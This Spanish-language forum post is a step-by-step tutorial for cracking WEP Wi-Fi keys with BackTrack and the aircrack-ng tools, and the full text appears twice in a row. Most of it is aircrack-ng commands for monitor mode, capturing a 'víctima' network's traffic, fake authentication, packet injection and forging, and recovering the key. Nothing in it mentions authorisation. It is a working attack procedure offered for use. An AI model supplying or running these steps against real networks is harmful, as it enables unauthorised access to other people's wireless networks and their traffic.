Saludos
Bueno, aquí pongo mi granito de arena al foro
Este sera un Tutorial SIMPLE para sacar claves WEP
1.- Descargar el CD de BackTrack (van por la versión 4.0 o ahi me quede yo )
2.- Grabar imagen.iso a CD o meter en PENDRIVE (Recomiendo GRABAR a CD)
3.- Resetear PC y arrancar el CD de BackTrack
Para ello tendremos que configurar nuestra BIOS o sino queremos calentarnos la cabeza , podemos usar la tecla F11 (en mi pc, en alguno es F8, TAB, ESC...) para iniciar en modo MENU BOOT
4.- Si pregunta por login, usaremos root y el password es toor, eso significa que tenemos problemas con la interfaz grafica, suele ser error del archivo xorg.conf situado en /etc/X11/xorg.conf
Para arreglarlo, simplemente copiaremos el backup que hay por el xorg.conf en uso
# cp /etc/X11/xorg.conf-vesa /etc/X11/xorg.conf
Y probamos a iniciar la interfaz gráfica con startx
5.- Pasamos a configurar el Layout del teclado, pues esta en USA y 104 teclas.
Para ello pincharemos con el botón derecho del ratón en la bandera, al lado de la hora y seguidamente en configure
Cambiamos 104 teclas por 105 para ello miramos "arriba" y añadimos la bandera de nuestro país que están a la "izquierda" (en mi caso España).
6.- Abrimos 4 terminales
6.1.- En el terminal 1, averiguaremos que nombre tiene nuestra interfaz wlan.
Para ello usaremos el comando iwconfig
Mi wlan se llama wlan0 asi que a partir de ahora, esta sera la interfaz, tu tendrás que poner la tuya
7.- Ponemos nuestra interfaz wlan0 en modo monitor
# airmon-ng wlan0 start
8.- En busca de la victima...
8.1.- Nos vamos un momento al terminal 2 y averiguamos nuestra MAC
# macchanger -s wlan0
8.2.- Volvemos al terminal 1 e iniciamos la pesca
# airodump-ng --encrypt WEP wlan0
EXPLICACIÓN: --encrypt WEP (es para filtrar solo las redes con cifrado WEP)
En la lista, solo tendremos que fijarnos en 2 cosas: el PWR y la #data
Estos 2 factores, son cruciales para ahorrarnos tiempo, pues el PWR nos dice la fuerza de señal con la que nos llega la red y la #data si en este momento hay trafico, si es asi, presiona CTRL+C para parar la pesca.
8.3.- Concentrándonos en la víctima
# airodump-ng --encrypt WEP -c CANAL_VÍCTIMA -bssid MAC_VICTIMA -w hack wlan0
EXPLICACIÓN:
-c CANAL_VÍCTIMA (es el canal "channel" al lado de #data
-bssid MAC_VÍCTIMA (es la MAC de la víctima a la izquierda, es lo primero
9.- "Conectándonos a su red..."
9.1.- Nos vamos al terminal 2 y ponemos:
# aireplay-ng -1 6000 -a MAC_VICTIMA -h NUESTRA_MAC wlan0
Esperamos a la carita feliz :-)
10.- Inyectando (FORMA SIMPLE)
10.1.- Nos vamos al terminal 3 y ponemos:
# aireplay-ng -3 -b MAC_VICTIMA -h NUESTRA_MAC wlan0
Y esperamos a tener suerte y con el trafico de la víctima inyectaremos trafico para conseguir 50.000 #data (cuando tengamos 10.000 #data leemos el paso 12.1)
Si no inyecta trafico pasamos a la FORMA ATAQUE, si inyecta trafico, saltate el siguiente paso.
11.- Inyectando (FORMA ATAQUE)
11.1.-En el terminal 3 ponemos
# aireplay-ng -5 -a MAC_VÍCTIMA -h NUESTRA_MAC wlan0
Buscara paquetes y cuando nos pregunte, le ponemos "y" (sin las comillas) y nos creara un archivo.xor, este archivo.xor lo tenemos que transformar en nuestra "key"
# packetforge-ng -1 -y archivo.xor -a MAC_VÍCTIMA -c NUESTRA_MAC -h NUESTRA_MAC -l 192.168.0.1 -k 192.168.0.100 -w key
11.2.- Ahora cojemos nuestra key y atacamos
#aireplay-ng -2 -r key wlan0
Nos preguntara, le decimos "y" (sin las comillas)
12.- Cuando alcancemos la cifra de 50.000 #data...
12.1.- Nos vamos al terminal 4 y ponemos:
# aircrack-ng -s *.cap
Con suerte nos sacara la clave 100% decrypted correctly
Y eso es todo amigos un saludo y espero que les sirva mi experiencia a alguien =)
by acidc00l
Bueno, aquí pongo mi granito de arena al foro
Este sera un Tutorial SIMPLE para sacar claves WEP
1.- Descargar el CD de BackTrack (van por la versión 4.0 o ahi me quede yo )
2.- Grabar imagen.iso a CD o meter en PENDRIVE (Recomiendo GRABAR a CD)
3.- Resetear PC y arrancar el CD de BackTrack
Para ello tendremos que configurar nuestra BIOS o sino queremos calentarnos la cabeza , podemos usar la tecla F11 (en mi pc, en alguno es F8, TAB, ESC...) para iniciar en modo MENU BOOT
4.- Si pregunta por login, usaremos root y el password es toor, eso significa que tenemos problemas con la interfaz grafica, suele ser error del archivo xorg.conf situado en /etc/X11/xorg.conf
Para arreglarlo, simplemente copiaremos el backup que hay por el xorg.conf en uso
# cp /etc/X11/xorg.conf-vesa /etc/X11/xorg.conf
Y probamos a iniciar la interfaz gráfica con startx
5.- Pasamos a configurar el Layout del teclado, pues esta en USA y 104 teclas.
Para ello pincharemos con el botón derecho del ratón en la bandera, al lado de la hora y seguidamente en configure
Cambiamos 104 teclas por 105 para ello miramos "arriba" y añadimos la bandera de nuestro país que están a la "izquierda" (en mi caso España).
6.- Abrimos 4 terminales
6.1.- En el terminal 1, averiguaremos que nombre tiene nuestra interfaz wlan.
Para ello usaremos el comando iwconfig
Mi wlan se llama wlan0 asi que a partir de ahora, esta sera la interfaz, tu tendrás que poner la tuya
7.- Ponemos nuestra interfaz wlan0 en modo monitor
# airmon-ng wlan0 start
8.- En busca de la victima...
8.1.- Nos vamos un momento al terminal 2 y averiguamos nuestra MAC
# macchanger -s wlan0
8.2.- Volvemos al terminal 1 e iniciamos la pesca
# airodump-ng --encrypt WEP wlan0
EXPLICACIÓN: --encrypt WEP (es para filtrar solo las redes con cifrado WEP)
En la lista, solo tendremos que fijarnos en 2 cosas: el PWR y la #data
Estos 2 factores, son cruciales para ahorrarnos tiempo, pues el PWR nos dice la fuerza de señal con la que nos llega la red y la #data si en este momento hay trafico, si es asi, presiona CTRL+C para parar la pesca.
8.3.- Concentrándonos en la víctima
# airodump-ng --encrypt WEP -c CANAL_VÍCTIMA -bssid MAC_VICTIMA -w hack wlan0
EXPLICACIÓN:
-c CANAL_VÍCTIMA (es el canal "channel" al lado de #data
-bssid MAC_VÍCTIMA (es la MAC de la víctima a la izquierda, es lo primero
9.- "Conectándonos a su red..."
9.1.- Nos vamos al terminal 2 y ponemos:
# aireplay-ng -1 6000 -a MAC_VICTIMA -h NUESTRA_MAC wlan0
Esperamos a la carita feliz :-)
10.- Inyectando (FORMA SIMPLE)
10.1.- Nos vamos al terminal 3 y ponemos:
# aireplay-ng -3 -b MAC_VICTIMA -h NUESTRA_MAC wlan0
Y esperamos a tener suerte y con el trafico de la víctima inyectaremos trafico para conseguir 50.000 #data (cuando tengamos 10.000 #data leemos el paso 12.1)
Si no inyecta trafico pasamos a la FORMA ATAQUE, si inyecta trafico, saltate el siguiente paso.
11.- Inyectando (FORMA ATAQUE)
11.1.-En el terminal 3 ponemos
# aireplay-ng -5 -a MAC_VÍCTIMA -h NUESTRA_MAC wlan0
Buscara paquetes y cuando nos pregunte, le ponemos "y" (sin las comillas) y nos creara un archivo.xor, este archivo.xor lo tenemos que transformar en nuestra "key"
# packetforge-ng -1 -y archivo.xor -a MAC_VÍCTIMA -c NUESTRA_MAC -h NUESTRA_MAC -l 192.168.0.1 -k 192.168.0.100 -w key
11.2.- Ahora cojemos nuestra key y atacamos
#aireplay-ng -2 -r key wlan0
Nos preguntara, le decimos "y" (sin las comillas)
12.- Cuando alcancemos la cifra de 50.000 #data...
12.1.- Nos vamos al terminal 4 y ponemos:
# aircrack-ng -s *.cap
Con suerte nos sacara la clave 100% decrypted correctly
Y eso es todo amigos un saludo y espero que les sirva mi experiencia a alguien =)
by acidc00l